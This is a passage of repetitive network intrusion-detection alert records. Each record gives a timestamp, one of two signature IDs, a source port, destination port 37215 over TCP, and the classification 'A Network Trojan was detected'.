              Timestamp:06/13/24-21:32:58.824338
              SID:2835222
              Source Port:49112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552340
              SID:2829579
              Source Port:50046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571748
              SID:2829579
              Source Port:38224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419861
              SID:2835222
              Source Port:37098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300398
              SID:2829579
              Source Port:53654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504021
              SID:2829579
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137780
              SID:2835222
              Source Port:50550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867872
              SID:2829579
              Source Port:51030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279635
              SID:2829579
              Source Port:37928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636091
              SID:2835222
              Source Port:39682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191062
              SID:2829579
              Source Port:40442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800977
              SID:2835222
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303062
              SID:2829579
              Source Port:36686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305142
              SID:2829579
              Source Port:50714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456823
              SID:2829579
              Source Port:33324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318448
              SID:2835222
              Source Port:49962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889295
              SID:2835222
              Source Port:59278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256009
              SID:2829579
              Source Port:48554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268836
              SID:2835222
              Source Port:50036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056955
              SID:2829579
              Source Port:38474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238141
              SID:2829579
              Source Port:46370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042951
              SID:2835222
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658232
              SID:2835222
              Source Port:46122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309802
              SID:2829579
              Source Port:56262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041937
              SID:2835222
              Source Port:49198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374887
              SID:2829579
              Source Port:52398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457107
              SID:2835222
              Source Port:52198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101086
              SID:2829579
              Source Port:52588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356502
              SID:2835222
              Source Port:42792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090604
              SID:2835222
              Source Port:52128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167849
              SID:2829579
              Source Port:54794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375066
              SID:2835222
              Source Port:36758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303607
              SID:2829579
              Source Port:55326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458535
              SID:2835222
              Source Port:59658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378225
              SID:2835222
              Source Port:50414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823722
              SID:2835222
              Source Port:42138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821763
              SID:2835222
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112602
              SID:2829579
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460095
              SID:2835222
              Source Port:40728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345282
              SID:2835222
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702644
              SID:2835222
              Source Port:35498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550905
              SID:2829579
              Source Port:54186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693831
              SID:2829579
              Source Port:41024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612851
              SID:2829579
              Source Port:59700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710656
              SID:2829579
              Source Port:52258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842681
              SID:2829579
              Source Port:47808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088063
              SID:2829579
              Source Port:59140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155399
              SID:2829579
              Source Port:32934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135813
              SID:2835222
              Source Port:57920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790524
              SID:2835222
              Source Port:59668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056416
              SID:2835222
              Source Port:56774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838778
              SID:2835222
              Source Port:39686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709739
              SID:2835222
              Source Port:37376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276000
              SID:2835222
              Source Port:58444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172906
              SID:2835222
              Source Port:38984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781863
              SID:2835222
              Source Port:43904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757221
              SID:2835222
              Source Port:35360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938097
              SID:2835222
              Source Port:53390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.092118
              SID:2829579
              Source Port:43978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884453
              SID:2829579
              Source Port:46184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556134
              SID:2835222
              Source Port:55794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371069
              SID:2835222
              Source Port:44640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254681
              SID:2829579
              Source Port:58228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786996
              SID:2829579
              Source Port:58364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318192
              SID:2835222
              Source Port:44030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254321
              SID:2835222
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421180
              SID:2829579
              Source Port:49532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026547
              SID:2829579
              Source Port:56440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168527
              SID:2829579
              Source Port:60994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753736
              SID:2829579
              Source Port:38232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509046
              SID:2835222
              Source Port:45386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840020
              SID:2829579
              Source Port:45540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323418
              SID:2835222
              Source Port:48012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275739
              SID:2829579
              Source Port:59776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308456
              SID:2829579
              Source Port:44490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728076
              SID:2835222
              Source Port:41234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131636
              SID:2835222
              Source Port:33934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303886
              SID:2835222
              Source Port:48630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451487
              SID:2829579
              Source Port:36072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694344
              SID:2835222
              Source Port:60008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783207
              SID:2829579
              Source Port:48548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275677
              SID:2835222
              Source Port:57874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306101
              SID:2835222
              Source Port:32804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016679
              SID:2829579
              Source Port:54202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372766
              SID:2835222
              Source Port:50224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711660
              SID:2835222
              Source Port:34140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278770
              SID:2835222
              Source Port:54130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090406
              SID:2835222
              Source Port:33884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635957
              SID:2835222
              Source Port:57672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913466
              SID:2829579
              Source Port:42464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696752
              SID:2829579
              Source Port:44152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194458
              SID:2829579
              Source Port:48724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415327
              SID:2835222
              Source Port:35522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753050
              SID:2835222
              Source Port:56644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242831
              SID:2835222
              Source Port:47236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838316
              SID:2829579
              Source Port:48106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272739
              SID:2835222
              Source Port:44364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246808
              SID:2829579
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217007
              SID:2829579
              Source Port:56946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480799
              SID:2829579
              Source Port:37354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056786
              SID:2829579
              Source Port:55938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213451
              SID:2835222
              Source Port:33026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509419
              SID:2829579
              Source Port:43772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358605
              SID:2829579
              Source Port:53706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820067
              SID:2835222
              Source Port:57706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377989
              SID:2835222
              Source Port:55312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786736
              SID:2835222
              Source Port:36714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415835
              SID:2835222
              Source Port:49336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377303
              SID:2835222
              Source Port:52052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196832
              SID:2829579
              Source Port:48826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044702
              SID:2829579
              Source Port:37956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952437
              SID:2835222
              Source Port:41314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060931
              SID:2835222
              Source Port:45330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611414
              SID:2829579
              Source Port:48586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989635
              SID:2829579
              Source Port:33892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910222
              SID:2835222
              Source Port:56636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212184
              SID:2829579
              Source Port:57732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.936560
              SID:2829579
              Source Port:59576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099337
              SID:2829579
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194354
              SID:2835222
              Source Port:47836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180916
              SID:2835222
              Source Port:33502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573420
              SID:2829579
              Source Port:60474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339707
              SID:2835222
              Source Port:60944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801015
              SID:2835222
              Source Port:45912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322335
              SID:2829579
              Source Port:40384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090113
              SID:2829579
              Source Port:35288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402652
              SID:2835222
              Source Port:46848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868092
              SID:2835222
              Source Port:40250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010550
              SID:2829579
              Source Port:41970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.825009
              SID:2829579
              Source Port:49182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728616
              SID:2829579
              Source Port:39672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200085
              SID:2835222
              Source Port:55752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041481
              SID:2835222
              Source Port:33060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265714
              SID:2829579
              Source Port:43404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935425
              SID:2835222
              Source Port:45022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322805
              SID:2835222
              Source Port:37604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749014
              SID:2835222
              Source Port:38702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177865
              SID:2829579
              Source Port:37490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077880
              SID:2829579
              Source Port:39824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422726
              SID:2835222
              Source Port:38662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884607
              SID:2829579
              Source Port:45992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155933
              SID:2835222
              Source Port:45724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199971
              SID:2835222
              Source Port:57610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524474
              SID:2835222
              Source Port:45740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656895
              SID:2829579
              Source Port:55160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656549
              SID:2835222
              Source Port:33560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509629
              SID:2835222
              Source Port:37190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669851
              SID:2835222
              Source Port:57524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404201
              SID:2835222
              Source Port:46800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222842
              SID:2829579
              Source Port:50184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154115
              SID:2829579
              Source Port:41318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.907928
              SID:2835222
              Source Port:58986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372304
              SID:2835222
              Source Port:33592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550336
              SID:2835222
              Source Port:47368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679238
              SID:2829579
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457470
              SID:2835222
              Source Port:56660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866112
              SID:2829579
              Source Port:56574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416687
              SID:2829579
              Source Port:50880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266338
              SID:2835222
              Source Port:52120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403885
              SID:2829579
              Source Port:33824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480745
              SID:2829579
              Source Port:41404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872608
              SID:2835222
              Source Port:53446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885878
              SID:2835222
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751938
              SID:2829579
              Source Port:43434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711597
              SID:2829579
              Source Port:36250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416018
              SID:2829579
              Source Port:51524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725550
              SID:2835222
              Source Port:48678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725944
              SID:2829579
              Source Port:41194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377705
              SID:2829579
              Source Port:39226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839312
              SID:2835222
              Source Port:37344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695584
              SID:2835222
              Source Port:55576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016917
              SID:2835222
              Source Port:55946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308159
              SID:2835222
              Source Port:49560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839693
              SID:2829579
              Source Port:35894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244795
              SID:2829579
              Source Port:45994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218860
              SID:2835222
              Source Port:52672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277271
              SID:2835222
              Source Port:45034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097319
              SID:2835222
              Source Port:38778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697536
              SID:2829579
              Source Port:60488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354325
              SID:2835222
              Source Port:39134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566239
              SID:2835222
              Source Port:48546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936338
              SID:2829579
              Source Port:59438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025779
              SID:2835222
              Source Port:56734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298310
              SID:2829579
              Source Port:54834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457590
              SID:2829579
              Source Port:35700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509917
              SID:2835222
              Source Port:49476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833061
              SID:2829579
              Source Port:33462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229378
              SID:2835222
              Source Port:34764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093868
              SID:2829579
              Source Port:34834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210926
              SID:2835222
              Source Port:35902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276043
              SID:2835222
              Source Port:50158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889456
              SID:2835222
              Source Port:36282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870407
              SID:2835222
              Source Port:47594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977204
              SID:2829579
              Source Port:41996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126647
              SID:2835222
              Source Port:37738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547165
              SID:2829579
              Source Port:59472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610515
              SID:2829579
              Source Port:57558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090010
